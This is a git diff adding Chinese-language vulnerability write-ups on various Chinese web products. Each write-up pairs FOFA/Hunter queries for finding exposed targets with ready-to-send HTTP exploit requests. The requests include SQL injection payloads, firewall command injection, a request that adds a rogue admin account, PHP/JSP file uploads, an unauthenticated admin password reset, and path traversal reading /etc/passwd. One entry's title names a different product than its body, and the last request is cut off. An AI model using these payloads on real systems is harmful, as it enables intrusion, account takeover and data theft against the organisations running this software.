+GET /loginednew.jsp?welcome=%BB%B6%D3%AD%CA%B9%D3%C3%20%B2%A9%CB%B9%C8%ED%BC%FEV6.0(20110701)&systemname=BS&account=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%28115%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28106%29%2BCHAR%2887%29%2BCHAR%28103%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28117%29%2BCHAR%2874%29%2BCHAR%28101%29%2BCHAR%28117%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2879%29%2BCHAR%2883%29%2BCHAR%2886%29%2BCHAR%28104%29%2BCHAR%2868%29%2BCHAR%2889%29%2BCHAR%28107%29%2BCHAR%2874%29%2BCHAR%2887%29%2BCHAR%2871%29%2BCHAR%28115%29%2BCHAR%28121%29%2BCHAR%2873%29%2BCHAR%28114%29%2BCHAR%2882%29%2BCHAR%2866%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%2872%29%2BCHAR%28117%29%2BCHAR%28106%29%2BCHAR%28121%29%2BCHAR%2880%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL--+EqLf&password=1&val=0000&availHeight=834&Safari=Y&loginurl= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241227215249023](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272152097.png)
\ No newline at end of file
diff --git a/博斯软件V6.0存在sql注入.md b/博斯软件V6.0存在sql注入.md
new file mode 100644
index 0000000..8f61e95
--- /dev/null
+++ b/博斯软件V6.0存在sql注入.md
@@ -0,0 +1,59 @@
+# 博斯软件V6.0 存在 sql 注入
+
+# 一、漏洞简介
+福建博思软件股份有限公司博斯软件V6.0 log/logined.jsp存在SQL注入漏洞。
+
+# 二、影响版本
++ 博斯软件V6.0
+
+# 三、资产测绘
++ hunter`web.title:"欢迎使用 博斯软件"`
++ 特征
+
+![1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe.png](./img/qesLgT3zkCECCWG7/1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe-167743.png)
+
+# 四、漏洞复现
+```java
+POST /log/logined.jsp HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate
+Content-Length: 106
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
+Host: xx.xx.xx.xx
+Connection: Keep-alive
+
+Submit=-1A&account=-1password=g-1';WAITFOR DELAY '0:0:5'--
+```
+
+![1697813144963-54dfd143-ad16-466e-accc-847ad43268c6.png](./img/qesLgT3zkCECCWG7/1697813144963-54dfd143-ad16-466e-accc-847ad43268c6-568851.png)
+
+sqlmap
+
+```java
+POST /log/logined.jsp HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate
+Content-Length: 106
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
+Host: xx.xx.xx.xx
+Connection: Keep-alive
+
+Submit=-1A&account=-1password=g-2
+```
+
+```java
+sqlmap -r 1.txt --batch --level 3 --thread 5
+```
+
+![1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07.png](./img/qesLgT3zkCECCWG7/1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07-922009.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zprm44mso2ysykrg>
\ No newline at end of file
diff --git a/博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞.md b/博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞.md
new file mode 100644
index 0000000..3ddfa18
--- /dev/null
+++ b/博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞.md
@@ -0,0 +1,117 @@
+# 博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞
+
+# 一、漏洞简介
+安恒明御运维审计与风险控制系统（简称“DASUSM”）是一款基于运维安全管理的理论和实践经验，结合各类法律法规（如等级保护、赛班斯法案SOX、PCI、企业内控管理、分级保护、ISO/IEC 27001等）对运维审计的要求，采用B/S架构，集“身份认证（Authentication）、账户管理（Account）、控制权限（Authorization）、日志审计（Audit）”于一体，支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询，具备全方位运维风险控制能力的统一安全管理与审计产品。安恒明御运维审计风险控制系统（堡垒机）存在任意用户添加漏洞，攻击者可利用该漏洞添加用户登录堡垒机。
+
+# 二、影响版本
++ 安恒明御运维审计与风险控制系统
+
+# 三、资产测绘
++ hunter:`app.name=="安恒明御运维审计与风险控制系统"`
+
+![1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44.png](./img/SZ4CFa0jWYPgqgUv/1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44-236122.png)
+
++ 首页
+
+![1691393366555-3c70041c-447d-415f-a6e6-bd852a153318.png](./img/SZ4CFa0jWYPgqgUv/1691393366555-3c70041c-447d-415f-a6e6-bd852a153318-596904.png)
+
+# 四、漏洞复现
+使用exp添加用户`qaxnb666/Admin123..`
+
+```java
+POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Length: 1112
+
+<?xml version="1.0"?>
+<methodCall>
+<methodName>web.user_add</methodName>
+<params>
+<param>
+<value>
+<array>
+<data>
+<value>
+<string>admin</string>
+</value>
+<value>
+<string>5</string>
+</value>
+<value>
+<string>10.17.1.1</string>
+</value>
+</data>
+</array>
+</value>
+</param>
+<param>
+<value>
+<struct>
+<member>
+<name>uname</name>
+<value>
+<string>qaxnb666</string>
+</value>
+</member>
+<member>
+<name>name</name>
+<value>
+<string>yuwe</string>
+</value>
+</member>
+<member>
+<name>pwd</name>
+<value>
+<string>Admin123..</string>
+</value>
+</member>
+<member>
+<name>authmode</name>
+<value>
+<string>1</string>
+</value>
+</member>
+<member>
+<name>deptid</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>email</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>mobile</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>comment</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>roleid</name>
+<value>
+<string>101</string>
+</value>
+</member>
+</struct></value>
+</param>
+</params>
+</methodCall>
+```
+
+![1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378.png](./img/SZ4CFa0jWYPgqgUv/1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378-989984.png)
+
+![1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9.png](./img/SZ4CFa0jWYPgqgUv/1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9-817517.png)
+
+
+
+> 更新: 2024-07-17 17:37:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ha1dzr2395nad5m3>
\ No newline at end of file
diff --git a/博达下一代防火墙sslvpn_client存在远程命令执行漏洞.md b/博达下一代防火墙sslvpn_client存在远程命令执行漏洞.md
new file mode 100644
index 0000000..8523258
--- /dev/null
+++ b/博达下一代防火墙sslvpn_client存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 博达下一代防火墙sslvpn_client存在远程命令执行漏洞
+
+# 一、漏洞简介
+博达下一代防火墙sslvpn_client存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 博达下一代防火墙
+
+# 三、资产测绘
++ hunter`web.title=="博达下一代防火墙"`||`web.title=="博达上网行为管理"`
++ 特征
+
+![1701763514488-337ef992-b1b8-4613-be19-61a335aefe7c.png](./img/KFOD6d47fNNCV5ke/1701763514488-337ef992-b1b8-4613-be19-61a335aefe7c-234395.png)
+
+# 四、漏洞复现
+```java
+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/KFOD6d47fNNCV5ke/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-955380.png)
+
+获取命令执行结果
+
+```java
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/KFOD6d47fNNCV5ke/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-247511.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hypcbmrskmt1pm4v>
\ No newline at end of file
diff --git a/卡号极团管理系统order存在SQL注入漏洞.md b/卡号极团管理系统order存在SQL注入漏洞.md
new file mode 100644
index 0000000..a542699
--- /dev/null
+++ b/卡号极团管理系统order存在SQL注入漏洞.md
@@ -0,0 +1,44 @@
+# 卡号极团管理系统order存在SQL注入漏洞
+
+# 一、漏洞简介
+号卡极团分销商城管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,卡号极团管理系统order存在SQL注入漏洞，攻击者获取数据库权限。
+
+# 二、影响版本
++ 卡号极团管理系统
+
+# 三、资产测绘
++ fofa`icon_hash="-795291075"`
++ 特征
+
+![1711762130074-1574a63a-86db-476c-88d8-f1d859f412c0.png](./img/7J6w5NhjMVIoid6V/1711762130074-1574a63a-86db-476c-88d8-f1d859f412c0-525058.png)
+
+# 四、漏洞复现
+```plain
+GET /order/index.php?pid=1%27+AND+GTID_SUBSET%28CONCAT%280x716a6a7171%2C%28SELECT+%28ELT%287046%3D7046%2C1%29%29%29%2C0x7162786b71%29%2C7046%29--+NqPh HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1711762221617-14382173-fac1-45b1-ac64-300c146f1395.png](./img/7J6w5NhjMVIoid6V/1711762221617-14382173-fac1-45b1-ac64-300c146f1395-376665.png)
+
+```plain
+qjjqq1qbxkq
+```
+
+sqlmap
+
+```plain
+/order/index.php?pid=1
+```
+
+![1711762244256-31d1262f-b6a1-4266-996a-eda7e00394c0.png](./img/7J6w5NhjMVIoid6V/1711762244256-31d1262f-b6a1-4266-996a-eda7e00394c0-456337.png)
+
+
+
+> 更新: 2024-04-20 22:27:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yyyq138u9iev4ton>
\ No newline at end of file
diff --git a/卡号极团管理系统ue_serve存在任意文件上传漏洞.md b/卡号极团管理系统ue_serve存在任意文件上传漏洞.md
new file mode 100644
index 0000000..f7d172e
--- /dev/null
+++ b/卡号极团管理系统ue_serve存在任意文件上传漏洞.md
@@ -0,0 +1,58 @@
+# 卡号极团管理系统ue_serve存在任意文件上传漏洞
+
+# 一、漏洞简介
+号卡极团分销商城管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,卡号极团管理系统ue_serve存在任意文件上传漏洞，攻击者可通过该漏洞或服服务器权限。
+
+# 二、影响版本
++ 卡号极团管理系统
+
+# 三、资产测绘
++ fofa`icon_hash="-795291075"`
++ 特征
+
+![1711762130074-1574a63a-86db-476c-88d8-f1d859f412c0.png](./img/vE7SHz5kAueo53Jl/1711762130074-1574a63a-86db-476c-88d8-f1d859f412c0-730376.png)
+
+# 四、漏洞复现
+```plain
+POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2
+Host: 
+Cookie: PHPSESSID=ecq4ucplk5n6e3ipihvktl103r
+Sec-Ch-Ua: "Not;A=Brand";v="99", "Chromium";v="106"
+Sec-Ch-Ua-Platform: "Windows"
+Sec-Ch-Ua-Mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylkv1kpsZgzw2WC03
+Accept: */*
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Length: 301
+
+------WebKitFormBoundarylkv1kpsZgzw2WC03
+Content-Disposition: form-data; name="name"
+
+raw.php
+------WebKitFormBoundarylkv1kpsZgzw2WC03
+Content-Disposition: form-data; name="upfile"; filename="raw.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundarylkv1kpsZgzw2WC03--
+```
+
+![1712065231240-c9736a70-517f-4255-8633-f9009bf48946.png](./img/vE7SHz5kAueo53Jl/1712065231240-c9736a70-517f-4255-8633-f9009bf48946-125755.png)
+
+上传文件位置
+
+```plain
+/upload/660c0ab3990c5_raw.php
+```
+
+![1712065262859-951af1ab-d863-45f4-894b-cea341168ea8.png](./img/vE7SHz5kAueo53Jl/1712065262859-951af1ab-d863-45f4-894b-cea341168ea8-520550.png)
+
+
+
+> 更新: 2024-04-20 22:27:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zl0fb1pz9uc16fmg>
\ No newline at end of file
diff --git a/卡车卫星定位系统存在密码重置漏洞.md b/卡车卫星定位系统存在密码重置漏洞.md
new file mode 100644
index 0000000..2809ddc
--- /dev/null
+++ b/卡车卫星定位系统存在密码重置漏洞.md
@@ -0,0 +1,58 @@
+# 卡车卫星定位系统存在密码重置漏洞
+
+# 一、漏洞简介
+卡车卫星定位系统是一种基于卫星通信和导航技术的系统，用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间，可以确定接收器（即卡车上的定位设备）所在的位置。卡车卫星定位系统存在密码重置漏洞，攻击者可通过该漏洞重置管理员密码获取应用系统权限。
+
+# 二、影响版本
++ 卡车卫星定位系统
+
+# 三、资产测绘
++ fofa`icon_hash="1553867732"`
++ 特征
+
+![1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec.png](./img/DjYibcHeiH4_N4z4/1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec-649467.png)
+
+# 四、漏洞复现
+未授权获取用户信息
+
+```plain
+GET /user/1 HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0.png](./img/DjYibcHeiH4_N4z4/1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0-321446.png)
+
+未授权重置用户密码
+
+```plain
+POST /user/create HTTP/1.1
+Host: 
+Content-Length: 216
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: wcms5c={%22L%22:%22en-US%22%2C%22V%22:%226.0.0.0%22%2C%22HP%22:8090%2C%22FP%22:[12060%2C12061%2C12062%2C12063]%2C%22TP%22:17891%2C%22RP%22:3113}
+Connection: close
+
+account=admin&id=1&password=test12345&passwordRepeat=test12345&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token=
+```
+
+![1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c.png](./img/DjYibcHeiH4_N4z4/1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c-438896.png)
+
+使用`admin/test123456`成功登录系统
+
+![1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6.png](./img/DjYibcHeiH4_N4z4/1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6-835533.png)
+
+
+
+> 更新: 2024-04-28 16:14:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ftoyh91uh1l7p5yz>
\ No newline at end of file
diff --git a/可视化融合指挥调度平台uploadImg存在任意文件上传漏洞.md b/可视化融合指挥调度平台uploadImg存在任意文件上传漏洞.md
new file mode 100644
index 0000000..fc840b6
--- /dev/null
+++ b/可视化融合指挥调度平台uploadImg存在任意文件上传漏洞.md
@@ -0,0 +1,53 @@
+# 可视化融合指挥调度平台uploadImg存在任意文件上传漏洞
+
+# 一、漏洞简介
+可视化融合指挥调度平台以标准SIP协议为核心，提供强大的调度、广播、视频、报警、预案、电子地图等功能模块，可实现多级架构管理，满足不同行业调度需求。可视化融合指挥调度平台 uploadImg 接口处存在任意文件上传漏洞，未经身份验证的攻击者可利用此漏洞上传恶意后门文件，导致服务器权限被控。
+
+# 二、影响版本
++ 可视化融合指挥调度平台
+
+# 三、资产测绘
++ fofa`body="base/searchInfoWindow_min.css"`
++ 特征
+
+![1712505801249-3dd9f411-b3c7-493b-af07-29fd9e07b090.png](./img/_XdfGiCW7VD3y65_/1712505801249-3dd9f411-b3c7-493b-af07-29fd9e07b090-227344.png)
+
+# 四、漏洞复现
+```plain
+POST /dispatch/layuiIm/uploadImg HTTP/1.1
+Host: 
+Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ctER307B0RaQwOp
+Content-Length: 151
+
+------WebKitFormBoundary7ctER307B0RaQwOp
+Content-Disposition: form-data; name="file";filename="1.jsp"
+
+1
+------WebKitFormBoundary7ctER307B0RaQwOp--
+```
+
+![1713789052420-7e9a2d81-065b-4060-ac9e-7199dc69b680.png](./img/_XdfGiCW7VD3y65_/1713789052420-7e9a2d81-065b-4060-ac9e-7199dc69b680-543057.png)
+
+```plain
+/media/png/2024/4/22/1713787261034.jsp
+```
+
+![1713789069296-23477b7b-48af-4956-ab92-aa404dc58516.png](./img/_XdfGiCW7VD3y65_/1713789069296-23477b7b-48af-4956-ab92-aa404dc58516-570969.png)
+
+
+
+> 更新: 2024-04-22 20:32:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bya2i7xgu6phi6t0>
\ No newline at end of file
diff --git a/吉大正元身份认证网关downTools任意文件读取漏洞.md b/吉大正元身份认证网关downTools任意文件读取漏洞.md
new file mode 100644
index 0000000..57a0344
--- /dev/null
+++ b/吉大正元身份认证网关downTools任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# 吉大正元身份认证网关downTools任意文件读取漏洞
+
+吉大正元身份认证网关 downTools 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。
+
+## fofa
+
+```javascript
+body="/jit_pnx_portal/" || header="server: jit_pnxcore1 web service" || title="吉大正元身份认证网关"
+```
+
+## poc
+
+```javascript
+GET /jit_pnx_portal/downTools?fileName=../../../../../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
+Connection: close
+```
+
+![image-20241101194808396](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011948455.png)
\ No newline at end of file
diff --git a/吉大正元身份认证网关downtools存在任意文件读取漏洞.md b/吉大正元身份认证网关downtools存在任意文件读取漏洞.md
new file mode 100644
index 0000000..2a08742
--- /dev/null
+++ b/吉大正元身份认证网关downtools存在任意文件读取漏洞.md
@@ -0,0 +1,43 @@
+# 吉大正元身份认证网关downtools存在任意文件读取漏洞
+
+# 一、漏洞简介
+ 吉大正元身份认证网关是提供内部网络的接入控制以及对接入用户进行强身份认证和审计服务的产品，解决用户使用应用系统时涉及的身份验证、信息保密、权限控制等安全问题。吉大正元身份认证网关downtools存在任意文件读取漏洞。
+
+# 二、影响版本
++ 吉大正元身份认证网关
+
+# 三、资产测绘
++ fofa`title="吉大正元身份认证网关"`
++ 特征
+
+![1729778241492-237326e1-b7f2-4329-9dec-df7fe40950e9.png](./img/XSH04fQGxTAZEfhK/1729778241492-237326e1-b7f2-4329-9dec-df7fe40950e9-065463.png)
+
+# 四 、漏洞复现
+```java
+GET /jit_pnx_portal/downTools?fileName=../../../../../../../../../etc/passwd HTTP/1.1
+Host: 
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+```
+
+![1729778389306-85ec46c0-c9fc-4e67-8427-ad027b4d4f80.png](./img/XSH04fQGxTAZEfhK/1729778389306-85ec46c0-c9fc-4e67-8427-ad027b4d4f80-870916.png)
+
+```java
+GET /jit_pnx_portal/downTools?fileName=../../../../../../../../../home/gateway/src/main/webapp/WEB-INF/web.xml HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
+Accept-Encoding: gzip, deflate
+Cache-Control: no-cache
+X-Requested-With: XMLHttpRequest
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+```
+
+![1729781375496-d3cb2e1b-69b0-4c2b-999e-ba4fb38cf9da.png](./img/XSH04fQGxTAZEfhK/1729781375496-d3cb2e1b-69b0-4c2b-999e-ba4fb38cf9da-716840.png)
+
+
+
+> 更新: 2024-11-27 10:04:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ercgu609qmwqlr09>
\ No newline at end of file
diff --git a/吉林医药系统Login存在SQL注入漏洞.md b/吉林医药系统Login存在SQL注入漏洞.md
new file mode 100644
index 0000000..49d1194
--- /dev/null
+++ b/吉林医药系统Login存在SQL注入漏洞.md
@@ -0,0 +1,54 @@
+# 吉林医药系统Login存在SQL注入漏洞
+
+# 一、漏洞简介
+医药系统Login存在SQL注入漏洞
+
+# 二、影响版本
++ 吉林医药系统
+
+# 三、资产测绘
++ fofa`icon_hash="775044030"`
+
+![1724330903965-56cc3f08-d8bd-45f0-ac8f-6ae92352d620.png](./img/KEXhPOOk2pxIcq1S/1724330903965-56cc3f08-d8bd-45f0-ac8f-6ae92352d620-535626.png)
+
+# 四、漏洞复现
+```plain
+POST /Login.aspx HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Cookie: ASP.NET_SessionId=ojsdqzhri20qo0zd3zkonnpx
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Content-Length: 293
+
+__VIEWSTATE=%2FwEPDwUKLTY0OTc3MzY5OA8WAh4TVmFsaWRhdGVSZXF1ZXN0TW9kZQIBFgICAw9kFgICBA8WAh4JaW5uZXJodG1sBSHlkInmnpfnnIHogZrliJvljLvoja%2FmnInpmZDlhazlj7hkZFiU%2FDEzLkPCmDf498pGBLrtD3FC5XsVsdyX0eaNHaa1&tbUser=admin%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&tbPassword=admin&btnLogin=+%B5%C7+%C2%BC+&hfSubmit=&__VIEWSTATEGENERATOR=C2EE9ABB
+```
+
+![1724331068388-6394ab7c-0ff5-4116-bf1d-b1bf0327cf5a.png](./img/KEXhPOOk2pxIcq1S/1724331068388-6394ab7c-0ff5-4116-bf1d-b1bf0327cf5a-499230.png)
+
+```plain
+POST /Login.aspx HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Cookie: ASP.NET_SessionId=ojsdqzhri20qo0zd3zkonnpx
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Content-Length: 293
+
+__VIEWSTATE=%2FwEPDwUKLTY0OTc3MzY5OA8WAh4TVmFsaWRhdGVSZXF1ZXN0TW9kZQIBFgICAw9kFgICBA8WAh4JaW5uZXJodG1sBSHlkInmnpfnnIHogZrliJvljLvoja%2FmnInpmZDlhazlj7hkZFiU%2FDEzLkPCmDf498pGBLrtD3FC5XsVsdyX0eaNHaa1&tbUser=admin&tbPassword=admin&btnLogin=+%B5%C7+%C2%BC+&hfSubmit=&__VIEWSTATEGENERATOR=C2EE9ABB
+```
+
+![1724330958589-25328917-1401-44eb-aaf4-b477d14cd9c8.png](./img/KEXhPOOk2pxIcq1S/1724330958589-25328917-1401-44eb-aaf4-b477d14cd9c8-895217.png)
+
+
+
+> 更新: 2024-11-27 10:01:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsfq16xdvbag4hu6>
\ No newline at end of file
diff --git a/同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞.md b/同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞.md
new file mode 100644
index 0000000..4b58207
--- /dev/null
+++ b/同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞.md
@@ -0,0 +1,40 @@
+# 同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞
+
+同享TXEHR V15人力管理平台的Assistant/Default.aspx接口存在敏感信息泄露漏洞。
+
+## fofa
+
+```yaml
+body="/Assistant/Default.aspx"
+```
+
+## poc
+
+```java
+POST /Service/ActiveXConnector.asmx HTTP/1.1
+Host: ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Content-Type: text/xml;charset=UTF-8
+Content-Length: 224
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
